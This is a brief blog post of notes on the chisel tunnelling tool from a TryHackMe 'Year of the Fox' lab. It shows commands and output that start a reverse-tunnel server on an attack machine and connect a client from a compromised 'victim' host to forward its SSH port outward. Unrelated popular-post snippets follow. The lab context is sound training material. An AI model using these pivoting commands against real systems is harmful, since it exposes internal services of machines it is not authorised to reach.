Skip to main content

chisel: Notes

chisel - Source: https://github.com/jpillora/chisel

Chisel on GitHub: https://github.com/jpillora/chisel

Chisel is written in Go.

Start chisel server on kali attack machine

root@X220:~# ./chisel server -p 8000 --reverse
2021/04/14 18:45:55 server: Reverse tunnelling enabled
2021/04/14 18:45:55 server: Fingerprint KL0WyhmdH+DdiSiBnHkqRFZ9AC7azAWqL+NBQ1pAmdM=
2021/04/14 18:45:55 server: Listening on http://0.0.0.0:8000

Run chisel client on victim machine to connect and create tunnel on port 22

www-data@year-of-the-fox:/tmp$ ./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
<./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
2021/04/14 12:51:33 client: Connecting to ws://10.8.146.172:8000
2021/04/14 12:51:35 client: Connected (Latency 228.164693ms)

Practice

>>> THM | Year of the Fox

Popular posts from this blog

Microsoft AI Shell: Notes

AI Shell

Windows 10: Install SuSE Linux Enterprise - SLES

With Microsoft-Windows-Subsystem-Linux feature enabled, we can install Linux distributions on Windows 10.

[MicrosoftVisualStudio]: Microsoft Visual Studio shortcut keys

Source:  http://visualstudioshortcuts.com/2015/ Analyze Navigate Backward Shift+Alt+3 Navigate Forward Shift+Alt+4 Architecture New Code Map Ctrl+\, Ctrl+O New UMLor Layer Diagram Ctrl+\, Ctrl+N Architecture Context Menus Add Node Ins Both Dependencies B Incoming Dependencies I Outgoing Dependencies O New Comment Ctrl+Shift+K Ctrl+E, C Remove Del Rename F2 Build Build Solution Ctrl+Shift+B Cancel Ctrl+Break Compile Ctrl+F7 Run Code Analysison Solution Alt+F11 Class Diagram Collapse Num - Expand Num + Class View Context Menus Properties Alt+Enter Misc Commit All Edits Shift+Alt+U Move Left Edgetotheleft Ctrl+Shift+, Move Left Edgetotheright Ctrl+Shift+. Move Right Edgetotheleft Ctrl+Shift+Alt+, Move Right Edgetotheright Ctrl+Shift+Alt+. TSql Editor Clone Query Ctrl+Alt+N TSql Editor Database Combo Shift+Alt+PgDn View File In Script Panel Shift+Alt+PgDn Debug Apply Code Changes Alt+F10 Attachto Process C...